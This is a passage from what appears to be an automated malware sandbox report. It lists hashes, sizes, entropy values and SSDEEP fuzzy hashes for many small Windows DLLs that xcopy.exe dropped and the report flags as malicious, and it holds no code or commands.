                                                                                                                                                                                                                                  Entropy (8bit):6.80987909121437
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:+HOMw3zdp3bwjGfue9/0jCRrndblWthWZNls9lPQ3I:QOMwBprwjGfue9/0jCRrndbUA3c
                                                                                                                                                                                                                                  MD5:3979437D6817CDF82DA474C8A1EEFB0D
                                                                                                                                                                                                                                  SHA1:5E96FE40993ACBC7C2E9A104D51A728950AD872E
                                                                                                                                                                                                                                  SHA-256:3DD2E16B6F135CDD45BCE4065F6493540EBBAF2F7F1553085A2442EA2CF80A10
                                                                                                                                                                                                                                  SHA-512:4F64C6D232FDAE3E7E583CB1AA39878ABBFBBC9466108B97A5DCE089C35EB30AF502B5B212B043C27C1B12B23C165BD2B559060C43D9E2EFCDDA777B34F0066B
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  • Antivirus: Virustotal, Detection: 0%
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11736
                                                                                                                                                                                                                                  Entropy (8bit):6.8337077664203205
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:uzKJWthWLWf9BvVVWQ4SWG5eicfvXqnajJ6HskpwG:xJWthWWNH5WXll6HNaG
                                                                                                                                                                                                                                  MD5:EDEC633DBC568551ED587065C743AC59
                                                                                                                                                                                                                                  SHA1:4D9D5A85797C832942CDD8F00673B1666DE8AE35
                                                                                                                                                                                                                                  SHA-256:031B58E1621211ED8F41AED863E5E4C05C271D5FDF8ABD51AA8E9D5EB3536511
                                                                                                                                                                                                                                  SHA-512:18EFFD73DDEEF38D69FA3223EECD1996FDDBDC49FC592BB942F60541CB20E0A28E5E220D7CA2F5F06ABD52FA2A70EC478765C8C8606764862C3AEF86DEABAC0A
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11232
                                                                                                                                                                                                                                  Entropy (8bit):6.907283275259189
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:WHEWthWwMiPDEs3f0DHDsVBIwgmqvrnDD0ADEs3TDL2L4m2grMWaLN5DEs3a6wpa:zWthWSwWf9BvVVWQ4SWben2qqnajWag
                                                                                                                                                                                                                                  MD5:E4CA639679FD3FEEC6A0923676D75E0D
                                                                                                                                                                                                                                  SHA1:5711C60F0C452CDAA380A43424FF8538623FF4D5
                                                                                                                                                                                                                                  SHA-256:1920E3AFA821558BADEABA7BDA9B8FE4ED5A5E7BDBB9F85B31D92FC0452030F4
                                                                                                                                                                                                                                  SHA-512:FBFCF57972AFF31BAA74DA9FC4158F155B9A6244768832376B9716E7D053FA34EDAADE8FC8F50D841A13D736FB63967C56EEB15A7DB9BA0B41588D27E842EC0B
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12256
                                                                                                                                                                                                                                  Entropy (8bit):6.769778659702413
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:hZDWthW/Wf9BvVVWQ4SWwgLXspjpC52qnajABI1T5:hZDWthWSN/Nlse11
                                                                                                                                                                                                                                  MD5:BC8C1B65A3FABA02EA3412113F2DE75D
                                                                                                                                                                                                                                  SHA1:761D2D0B3C13F5076B97874CD0B6D57A97A9EABA
                                                                                                                                                                                                                                  SHA-256:5009391754032B93BC3F950B5E17D4ED7BFD37941170F97F65C596D9ECDF8E75
                                                                                                                                                                                                                                  SHA-512:B7E87E031F7437A115D9F76AA2A2CD59F34042448A098951773F32286DD7F3F57979C3F0E7026138CE4D4C3C6F6D4F6838A5C306EF874C02914D9272091744E3
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13792
                                                                                                                                                                                                                                  Entropy (8bit):6.668459486612788
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:ShHk1Jzb9cKcIhWthW6Wf9BvVVWQ4SWVcrS0tkqnajOyr39b7j:QHk1JzBcKcIhWthW3NtKlqyrxH
                                                                                                                                                                                                                                  MD5:95C3F386F30F7D0E68909D7B7C43246F
                                                                                                                                                                                                                                  SHA1:FB81C7F1F0F444DAA5B3299580528196AD50E592
                                                                                                                                                                                                                                  SHA-256:D7716BA9DB032B306BE6B48E93B379B4E0A9E763A12671441422507236ABECB5
                                                                                                                                                                                                                                  SHA-512:8AC039726C23BEE52C7F5E1CBD8B40D9D0BF7FDA0B322666B38F004E3BA65AFAFFA16494C38B588F6B4A27F91B69A9ABC0F190D120325C8BCAC741FB4A02A87E
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11744
                                                                                                                                                                                                                                  Entropy (8bit):6.835955914490612
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:5/DiDfIepWthWjWf9BvVVWQ4SW4zKsmsqnajrQAVO:EDfIepWthWuNCs9lPQAg
                                                                                                                                                                                                                                  MD5:4DA67FEEFEB86B58A20B3482B93285B3
                                                                                                                                                                                                                                  SHA1:6CD7F344D7CA70CF983CADDB88FF6BAA40385EF1
                                                                                                                                                                                                                                  SHA-256:3A5D176B1F2C97BCA7D4E7A52590B84B726796191AE892D38AD757FD595F414D
                                                                                                                                                                                                                                  SHA-512:B9F420D30143CF3F5C919FA454616765602F27C678787D34F502943567E3E5DFB068FEC8190FEA6FA8DB70153ED620EB4FE5DC3092F9B35B7D46B00CC238E3BA
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):10720
                                                                                                                                                                                                                                  Entropy (8bit):6.957943556643638
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:vHaIWthW9Wf9BvVVWQ4SWmDQ80Hy5qnajslBE87K344u7:v6IWthW4N+slEE87KI4c
                                                                                                                                                                                                                                  MD5:97C67B3BDADCCA4FE30F720D7128A625
                                                                                                                                                                                                                                  SHA1:52EE534A3CBFA86F8B895212154D610C8EA9ECE7
                                                                                                                                                                                                                                  SHA-256:49E587C970471A29BC49B8ACE18510B4BD2B1A561484314CDDDDD10FBF5334DA
                                                                                                                                                                                                                                  SHA-512:D4E92A2AEFE890966CADE724D93811C8242C6E6A54A0F29FAC0CBEB517D96DC57C535F939A477731EA55BD74BABC4DAF93384DA00DE0104BD0122868A1260AFC
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11232
                                                                                                                                                                                                                                  Entropy (8bit):6.774749053687173
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:9GlWthWWWf9BvVVWQ4SWNxhefx80Hy5qnajslBE87H00:9GlWthWbN44ZslEE87H/
                                                                                                                                                                                                                                  MD5:04CE356D4A5D956BE5531A1D60D00A8F
                                                                                                                                                                                                                                  SHA1:C65C6AE9FF7A96A8276AEA4C357D2080591163A9
                                                                                                                                                                                                                                  SHA-256:0D365A06FAD099CFA98DC2DDF0CA16DABBC5319B99C29B49BE25F3C9809DA2D9
                                                                                                                                                                                                                                  SHA-512:F59569F4C1BA9D19492C1B1AF41E1FE28732EEA8BE065CF069ABC01300D84059C87179688E25800D44FF3C60E5847BC14F4423B08ECE56862EC75ACC445BC50E
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11232
                                                                                                                                                                                                                                  Entropy (8bit):6.868076466757322
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:LGyMvpWthWZZWf9BvVVWQ4SWMnSOuUgxfzfqnaj0OcW6O:LGyMvpWthWKN3fIrloqR
                                                                                                                                                                                                                                  MD5:BC3B85970CD46063F11D39E18166746B
                                                                                                                                                                                                                                  SHA1:5B957EDD3FF4EF0B72F1CA29853C1BC1630BDC85
                                                                                                                                                                                                                                  SHA-256:3C48D059B21126A3755E676758DF54B6779C975D13CFD10990A3C29CCFD95571
                                                                                                                                                                                                                                  SHA-512:93290660D9CE8D8F1391AD7C0F3BE9AB855F78004B30842283136BC61971B715FAA29D02E00B158E3F1EE56D52CD0AD090C511E464D251DBBA51E835DF6079F3
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13280
                                                                                                                                                                                                                                  Entropy (8bit):6.729198626080774
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:pM2dv3V0dfpkXc2MAvVaoKFWthWMWf9BvVVWQ4SWiQJFaaqqnajW+:ldv3V0dfpkXc0vVavWthW5NlIFYlK+
                                                                                                                                                                                                                                  MD5:68A8AD8A1B296DD3203C53D163089E64
                                                                                                                                                                                                                                  SHA1:171ED7617B7C186DED4B09A250B9C94AAA1AA8FD
                                                                                                                                                                                                                                  SHA-256:C8925EE61E3135ACA8B56498C0304BF0DB981930D1E3D36CCAE2F84791C86908
                                                                                                                                                                                                                                  SHA-512:91D93C1C2D8AA5343EF2BD316106CC28E3BA5A48E2C1647BA7054FBFAF79B1B9CDB3298899D0EC63B795C7D5A23D73D2AE7A1902FC8136B29F9340AA95227C37
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11744
                                                                                                                                                                                                                                  Entropy (8bit):6.8774870825959455
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:dY3ZDQtZ34WthWhIaWf9BvVVWQ4eWqgqtkqnajOyr39fk:dY3ZDQtZ34WthWhiNClqyry
                                                                                                                                                                                                                                  MD5:C250B2E4FF04D22306BF8CE286AFD158
                                                                                                                                                                                                                                  SHA1:E5C60B7892FF64CBFF02D551F9DBF25218C8195B
                                                                                                                                                                                                                                  SHA-256:42367B6B7285BDDC185C0BADEFE49E883646F574B1D7D832C226F2D1CE489C5B
                                                                                                                                                                                                                                  SHA-512:A78C4DDF98330698C9DA8D1D2C7C3176F22DFABF0900008CFF1F294F56A2A14B52BECD09BA37A065D544F58617911B3F5850614B5AABD0EC7DAF236F29C9B10B
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12256
                                                                                                                                                                                                                                  Entropy (8bit):6.7734901397416305
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:u7QzKIMF8WthWSWf9BvVVWQ4SWWvWjsmsqnajrQgdu:u8zRWthWvN9As9lPQ0u
                                                                                                                                                                                                                                  MD5:5358E9B3DAD8730ED4B2DA280161175F
                                                                                                                                                                                                                                  SHA1:91066FF0FB55FD30E3C554655D6EEC47A13A1773
                                                                                                                                                                                                                                  SHA-256:77B5019D54AA05AD70D0C1BEC4A7EA5F3BA499B493C03EA198B27CEB8509D1AF
                                                                                                                                                                                                                                  SHA-512:061B63B1965D3203116AAA7E026420D5BB3A0874237671E14A31ABCA889DD728575F625EEE3117FF26DCFEC9D842306CDDFA134C2FAE9947BFD46D7D9EB50F1E
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11736
                                                                                                                                                                                                                                  Entropy (8bit):6.871940955476924
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:M3WthWjWf9BvVVWQ4SWiXfvXqnajJ6HdKpx:M3WthWuNNXll6Hdmx
                                                                                                                                                                                                                                  MD5:3339350008A663975BA4953018C38673
                                                                                                                                                                                                                                  SHA1:78614A1AAD7FC83D6999DCC0F467B43693BE3D47
                                                                                                                                                                                                                                  SHA-256:4F77ABB5C5014769F907A194FD2E43B3C977DF1FB87F8C98DD15A7B950D1E092
                                                                                                                                                                                                                                  SHA-512:A303FD57DD59F478A8D6C66785768886509625A2BAF8BF2B357BB249FC93F193AC8C5C2C9193E53738805700E49B941BF741D6C4850A43F29A82424CCDDA191B
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11224
                                                                                                                                                                                                                                  Entropy (8bit):6.802243596545944
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:zqWthWVWf9BvVVWQ4SWSIxfvXqnajJ6HOv:zqWthWwNvSXll6HA
                                                                                                                                                                                                                                  MD5:75CE488183D0627B89BAA0B174CF2C2F
                                                                                                                                                                                                                                  SHA1:E66C1BAC9625AFE091A0EF4B46615BB07103D442
                                                                                                                                                                                                                                  SHA-256:8C2D5915B436C2848CEFAC33AE47E5BA1E96EBA0310B9836F069BB5C767A7D42
                                                                                                                                                                                                                                  SHA-512:6A6DB2DFF988E8175C5FDA3DC7FC8925C2CBFEE90088DE50715FCA3010C3C47E0E554329126B1B345B19C5EBE5CD867A81FB904C7E47AA1B41963D856A1CF7DE
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12256
                                                                                                                                                                                                                                  Entropy (8bit):6.79800869596736
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:wEWthWyWf9BvVVWQ4SWbTKMdn2KqnajySHrG:wEWthWPNanll1HrG
                                                                                                                                                                                                                                  MD5:EB07D1E84FD3FD83E71C1EA7AE8498A3
                                                                                                                                                                                                                                  SHA1:B162375E93C40955244342D18902BFF8ED902674
                                                                                                                                                                                                                                  SHA-256:687BE4F560DC3FB96BCDA9332617A2D4B1D587411DD1C31AD088146AC0B24A76
                                                                                                                                                                                                                                  SHA-512:5787637599E1EC9F086C78BFA4CE7D49A8374404DBCE8D884E90282B366A446EF3444288ADD0F3741C642BEB01266555053091BDEE2EE70BF6126052BF1564E0
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):15328
                                                                                                                                                                                                                                  Entropy (8bit):6.567637461631769
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:3M0wd8dc9cyNWthW3Wf9BvVVWQ4SWLbnstWqqnajWz:80wd8xyNWthWKNUe7lKz
                                                                                                                                                                                                                                  MD5:392B572DC6275D079270AD8E751A2433
                                                                                                                                                                                                                                  SHA1:8347BBA17ED3E7D5C2491F2177AF3F35881E4420
                                                                                                                                                                                                                                  SHA-256:347CEEB26C97124FB49ADD1E773E24883E84BF9E23204291066855CD0BAEA173
                                                                                                                                                                                                                                  SHA-512:DBDBD159B428D177C5F5B57620DA18A509350707881FB5040AC10FAF2228C2CCFD6126EA062C5DD4D13998624A4F5745ED947118E8A1220190FDB93B6A3C20B7
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11744
                                                                                                                                                                                                                                  Entropy (8bit):6.770473650765546
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:f9KNMWthWbWf9BvVVWQ4SWAV/tkqnajOyr39J:1KNMWthWGNQlqyrn
                                                                                                                                                                                                                                  MD5:9806F2F88BA292B8542A964C0B102876
                                                                                                                                                                                                                                  SHA1:C02E1541A264A04963ADD31D2043FA954B069B6B
                                                                                                                                                                                                                                  SHA-256:CF601A7B883BB4FB87C28B4A1D9F823D2454B298CDBCB4DA4F508DB8BD1278BA
                                                                                                                                                                                                                                  SHA-512:D68CB926DE3CAA498AD2AEA60E2C5DBB72F30836A6AD9BB11A48F2CA706656981D9332DAE44769CCF6F8DE3B2EA1507983440AFBE1322520F2FD1674CD8DE823
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):13280
                                                                                                                                                                                                                                  Entropy (8bit):6.8016146360593925
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:YGnWlC0i5ClWthWIpWf9BvVVWQ4SWPlQ4Ms5jpC52qnajABI1yVqC:XnWm5ClWthW/NKKls5Nlse1TC
                                                                                                                                                                                                                                  MD5:1747189E90F6D3677C27DC77382699D8
                                                                                                                                                                                                                                  SHA1:17E07200FC40914E9AA5CBFC9987117B4DC8DB02
                                                                                                                                                                                                                                  SHA-256:6CC23B34F63BA8861742C207F0020F7B89530D6CDD8469C567246A5879D62B82
                                                                                                                                                                                                                                  SHA-512:D2CC7223819B9109B7CE2475DFB2A58DA78D0D3D606B05B6F24895D2F05FB1B83EE4C1D7A863F3C3488F5D1B014CD5B429070577BD53D00BB1E0A0A9B958F0B1
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12256
                                                                                                                                                                                                                                  Entropy (8bit):6.739864339949008
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:uaY17aFBRQWthWAWf9BvVVWQ4SWk7djwqS8uUgxfzfqnaj0O4WzQ:0tWthWFNl5nFIrloqU
                                                                                                                                                                                                                                  MD5:1BCB55590AB80C2C78F8CE71EADEB3DC
                                                                                                                                                                                                                                  SHA1:8625E6ED37C1A5678C3B4713801599F792DC1367
                                                                                                                                                                                                                                  SHA-256:A3F13FA93131A17E05AD0C4253C34B4DB30D15EAE2B43C9D7EC56FDC6709D371
                                                                                                                                                                                                                                  SHA-512:D80374EC9B17692B157031F771C6C86DC52247C3298594A936067473528BBB511BE4E033203144BBF2EC2ACFD7E3E935F898C945EB864DCF8B43AE48E3754439
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11744
                                                                                                                                                                                                                                  Entropy (8bit):6.869420709868426
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:B9vbJWthWZWf9BvVVWQ4SWRHQ0tkqnajOyr39jGJ:B9vbJWthWMNS4lqyrM
                                                                                                                                                                                                                                  MD5:7481E20041CF8E366D737962D23EC9DE
                                                                                                                                                                                                                                  SHA1:A13C9A2D6CF6C92050EAAE5ECB090A401359D992
                                                                                                                                                                                                                                  SHA-256:4615EC9EFFC0C27FC0CFD23AD9D87534CBE745998B7D318AE84ECE5EA1338551
                                                                                                                                                                                                                                  SHA-512:F7A8E381D1AC2704D61258728A9175834CF414F7F2FF79BD8853E8359D6468839585CB643F0871334B943B0F7B0D868E077F6BD3F61668E54785EE8B94BF7903
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):21984
                                                                                                                                                                                                                                  Entropy (8bit):6.275215209761443
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:eqTycTGMMmfcObM4Oe5/cDHosrbmkvALwPIgTmL45WthWlWf9BvVVWQ4SWO2odVE:xt1MCbM4Oe5grykfIgTmLCWthWgNwlKU
                                                                                                                                                                                                                                  MD5:F4E9937296EC528938A3C28A48687F5C
                                                                                                                                                                                                                                  SHA1:961390A2C5E08336857C8A39B254B2BFE3D8BDC6
                                                                                                                                                                                                                                  SHA-256:190A2CC8C8E47FCD4D07B4E260E247FB3B5FB4661AA50F7B05158CD062D80762
                                                                                                                                                                                                                                  SHA-512:00CCF9326E593236F57C39FFCD3AB1A77C54755C5F938207AD548D64D60A7468EA21F6E340D385E6576BB049BCA1DD318DA572C5808C353DDA1C4629FD99BC42
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):19424
                                                                                                                                                                                                                                  Entropy (8bit):6.29176027690929
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:0SrxLPmIHJI6/CpG3t2G3t4odXLRWthW5NsH9slEE87oV:0iPmIHJI6msut7g
                                                                                                                                                                                                                                  MD5:34CBF951DFE519D8CC0034D13026BB26
                                                                                                                                                                                                                                  SHA1:156E860545717772C0B290AC9BF6883D9769419F
                                                                                                                                                                                                                                  SHA-256:B05A5303C9C1059216787E878884B96474480AE5505DC60BE97095F8CDF876D5
                                                                                                                                                                                                                                  SHA-512:5E812C17866EDF300C21F8D5EE121EE8B4225288FF10A937870356EE2DC780A54FB3244AB6A01CE8FF2FD2D2FA023377335D8DA13F09B8C8E6FC30C6EE53CECC
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):66016
                                                                                                                                                                                                                                  Entropy (8bit):5.544944564166023
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:vfolDe5c4bFE2Jy2cvxXWpD9d3334BkZnkPHOtq:XolDe5c4bFE2Jy2cvxXWpD9d3334BkZy
                                                                                                                                                                                                                                  MD5:C79DDCFA529DC335ED3E5D538243BF92
                                                                                                                                                                                                                                  SHA1:1C960C665242142ACA25DF06A0BC29C73126BC73
                                                                                                                                                                                                                                  SHA-256:E5799A718CFA39B0B6CCDC88F3732CD5DD13C5E4A64DE6CFF4ED4EBA20DE3371
                                                                                                                                                                                                                                  SHA-512:07A36836DAAC82A993C198402633CCAB80AC1046BC3F85EBAC7BEF6219B6C8A8C3AAC88E96D1143E33E113A7A73F8B6DFE0D7C91920AB9F23B532D64FA5D3589
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):12256
                                                                                                                                                                                                                                  Entropy (8bit):6.768289494091275
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:MConqjd7NWthWuWf9BvVVWQ4SW0wmqqnajWW/Q:MConsWthWzN+lK+Q
                                                                                                                                                                                                                                  MD5:C498A15DE6A91156009C6E5BC0DE1FF2
                                                                                                                                                                                                                                  SHA1:1B015D9F793518BE3C579FDC4334BF81E6F4E874
                                                                                                                                                                                                                                  SHA-256:194F04516084785A9650EAC58777AE7ACEBD90D5FABC3E21CEBDF705CC0D34B6
                                                                                                                                                                                                                                  SHA-512:898107D0D34A6668C7D00E2C4818023F7ADA7229EB06E7BCF7BF745575F30F8DD58503FBD266F9F5498DAD915E7344000684A0CF533781130C471A30307EDB67
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):15840
                                                                                                                                                                                                                                  Entropy (8bit):6.597851406056642
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:1JB0fhrpIhhf4AN5/jiDWthWhxWf9BvVVWQ4eWVvjwBjpC52qnajABI1wkM:10hrKIWthWhkNIjwBNlse13M
                                                                                                                                                                                                                                  MD5:047C779F39EBB4F57020CD5B6FB2D083
                                                                                                                                                                                                                                  SHA1:440077FC83D1C756FE24F9FB5EAE67C5E4ABD709
                                                                                                                                                                                                                                  SHA-256:078D2551F53CA55715F5C6A045DE1260CE331B97FD6D047F8455E06D97EF88DC
                                                                                                                                                                                                                                  SHA-512:95A57D79C47D11F43796AEA8FD1183D3DB9448DEE60530144B64A2DD3CD863F5B413356076C26101D96DD007EBF8AFF9E23CF721BA4E03D932C333B8E5536B73
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):17376
                                                                                                                                                                                                                                  Entropy (8bit):6.502279400133776
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:wpPLNPjFuWYFxEpahDWthWAcWf9BvVVWQ4SWQZ/bSoMdn2KqnajySHUZt:w19OFVhDWthWSNpQnll1HUZt
                                                                                                                                                                                                                                  MD5:10E9DFC88BF784847E7B9AAB82E28D0C
                                                                                                                                                                                                                                  SHA1:CB750CF87D561CA32F5860854DA374DAE6C9F2AD
                                                                                                                                                                                                                                  SHA-256:E6BAB87156C9E7AE14CE36A754EB6891891A22DDFFF584B706538152017FBB0F
                                                                                                                                                                                                                                  SHA-512:29C2EDB44CADA75EE8CCAE1B55A405C8282C937450913196D54B6DA1A1E121451C6E14A92A200574984961FA8C649D8A40CAF58EA50A33D42A7DFAE4439091C2
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):17888
                                                                                                                                                                                                                                  Entropy (8bit):6.384196070928042
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:uFvU4x0C5yguNvZ5VQgx3SbwA7yMVIkFGlPWthWENkEDnll1H+vBn:C5yguNvZ5VQgx3SbwA71IkFFx1MBn
                                                                                                                                                                                                                                  MD5:1F1D50AA4553E77F6B90AE13BD56A95C
